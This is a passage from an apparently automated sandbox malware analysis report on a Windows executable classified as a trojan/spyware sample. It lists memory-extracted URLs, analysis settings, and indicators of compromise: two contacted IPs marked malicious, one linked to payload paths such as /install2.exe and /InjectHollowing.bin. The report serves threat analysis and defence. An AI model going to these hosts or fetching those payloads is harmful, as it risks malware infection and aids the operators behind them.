                                https://duckduckgo.com/ac/?q=GR8jRQeRUr.exe, 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591029105.000000001E96F000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590648971.000000001E7EA000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590799521.000000001E8AE000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591267383.000000001EAB0000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591318944.000000001EAFB000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583560791.000000001F89D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583621640.000000001F90F000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591722392.000000001F7DA000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583684692.000000001F980000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591069977.000000001E985000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591648322.000000001F769000.00000004.00000001.sdmpfalse
                                  		high
                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                    		high
                                    http://tempuri.org/Entity/Id12ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591069977.000000001E985000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://tempuri.org/GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://tempuri.org/Entity/Id2ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                      		high
                                      http://tempuri.org/Entity/Id21ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                        		high
                                        http://tempuri.org/Entity/Id9GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                          		high
                                          http://tempuri.org/Entity/Id8GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/Entity/Id5GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/PrepareGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                            		high
                                            http://tempuri.org/Entity/Id4GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/Entity/Id7GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/Entity/Id6GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                              		high
                                              https://support.google.com/chrome/?p=plugin_realGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                		high
                                                http://tempuri.org/Entity/Id19ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultlGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.interoperabilitybridges.com/wmp-extension-for-chromeGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://support.google.com/chrome/?p=plugin_pdfGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/faultGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wsatGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://tempuri.org/Entity/Id15ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591127609.000000001E9E5000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://forms.real.com/real/realone/download.html?type=rpsp_usGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://support.aGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://tempuri.org/Entity/Id6ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://api.ip.sb/ipGR8jRQeRUr.exe, 0000000F.00000002.590456261.000000001E680000.00000004.00020000.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exeGR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://support.google.com/chrome/?p=plugin_quicktimeGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2004/04/scGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://tempuri.org/Entity/Id9ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=GR8jRQeRUr.exe, 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591029105.000000001E96F000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590648971.000000001E7EA000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590799521.000000001E8AE000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591267383.000000001EAB0000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591318944.000000001EAFB000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583560791.000000001F89D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583621640.000000001F90F000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591722392.000000001F7DA000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583684692.000000001F980000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591069977.000000001E985000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591648322.000000001F769000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://tempuri.org/Entity/Id20GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://tempuri.org/Entity/Id21GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://tempuri.org/Entity/Id22GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://tempuri.org/Entity/Id23GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://nsis.sf.net/NSIS_ErrorErrorGR8jRQeRUr.exefalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://tempuri.org/Entity/Id24GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://tempuri.org/Entity/Id24ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://tempuri.org/Entity/Id1ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressingGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://support.google.com/chrome/?p=plugin_shockwaveGR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://forms.reaGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/trustGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://tempuri.org/Entity/Id10GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://tempuri.org/Entity/Id11GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://tempuri.org/Entity/Id12GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://tempuri.org/Entity/Id16ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://tempuri.org/Entity/Id13GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://tempuri.org/Entity/Id14GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://tempuri.org/Entity/Id15GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://tempuri.org/Entity/Id16GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/NonceGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://tempuri.org/Entity/Id17GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://tempuri.org/Entity/Id18GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://tempuri.org/Entity/Id5ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://tempuri.org/Entity/Id19GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://tempuri.org/Entity/Id10ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RenewGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://tempuri.org/Entity/Id8ResponseGR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://support.google.com/chrome/?p=plugin_wmpGR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://support.google.com/chrome/answer/6258784GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2006/02/addressingidentityGR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpfalse
                                                                                                                                                		high

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                185.112.83.8
                                                                                                                                                		unknownRussian Federation
                                                                                                                                                		50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                                194.26.229.202
                                                                                                                                                		unknownNetherlands
                                                                                                                                                		1213HEANETIEtrue

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                Analysis ID:541930
                                                                                                                                                Start date:18.12.2021
                                                                                                                                                Start time:08:24:06
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 8m 49s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Sample file name:GR8jRQeRUr (renamed file extension from none to exe)
                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Number of analysed new started processes analysed:25
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@3/4@0/2
                                                                                                                                                EGA Information:Failed
                                                                                                                                                HDC Information:
                                                                                                                                                • Successful, ratio: 28.7% (good quality ratio 28.1%)
                                                                                                                                                • Quality average: 88.4%
                                                                                                                                                • Quality standard deviation: 21%
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 85%
                                                                                                                                                • Number of executed functions: 365
                                                                                                                                                • Number of non-executed functions: 39
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Override analysis time to 240s for sample files taking high CPU consumption
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 23.54.113.104
                                                                                                                                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                TimeTypeDescription
                                                                                                                                                08:27:20API Interceptor17x Sleep call for process: GR8jRQeRUr.exe modified

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                185.112.83.8SecuriteInfo.com.generic.ml.1574.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.112.83.8/InjectHollowing.bin
                                                                                                                                                mixfive_20211216-221155.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.112.83.8/Allocation.bin
                                                                                                                                                R0c5Z733SP.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.112.83.8/install2.exe
                                                                                                                                                NF4JgDw9LJ.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.112.83.8/install2.exe
                                                                                                                                                194.26.229.202SecuriteInfo.com.generic.ml.1574.exeGet hashmaliciousBrowse
                                                                                                                                                  mixfive_20211216-221155.exeGet hashmaliciousBrowse
                                                                                                                                                    2e6ee519c03027ea1b07d81a8ff35e5ea98ba60df7024.exeGet hashmaliciousBrowse

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      HEANETIESecuriteInfo.com.generic.ml.1574.exeGet hashmaliciousBrowse
